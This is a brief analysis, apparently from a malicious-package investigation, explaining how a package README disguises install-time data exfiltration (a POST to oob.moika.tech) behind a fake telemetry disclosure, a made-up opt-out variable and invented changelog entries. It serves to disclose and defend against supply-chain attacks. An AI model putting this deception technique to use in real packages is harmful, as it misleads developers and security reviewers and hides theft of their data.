README Telemetry Disclosure Social Engineering

Package README declares a fake telemetry feature with a fabricated opt-out environment variable and plausible internal telemetry domain. This normalizes expected outbound network activity at install time. Developers and security reviewers see a disclosure with an opt-out — standard practice for legitimate telemetry — and do not investigate the actual exfiltration POST to oob.moika.tech. The telemetry domains are not functional C2; they exist only in README text as social engineering artifacts. Fake changelog entries with plausible version history further present the package as a mature, ongoing project rather than a fresh first-and-only publish.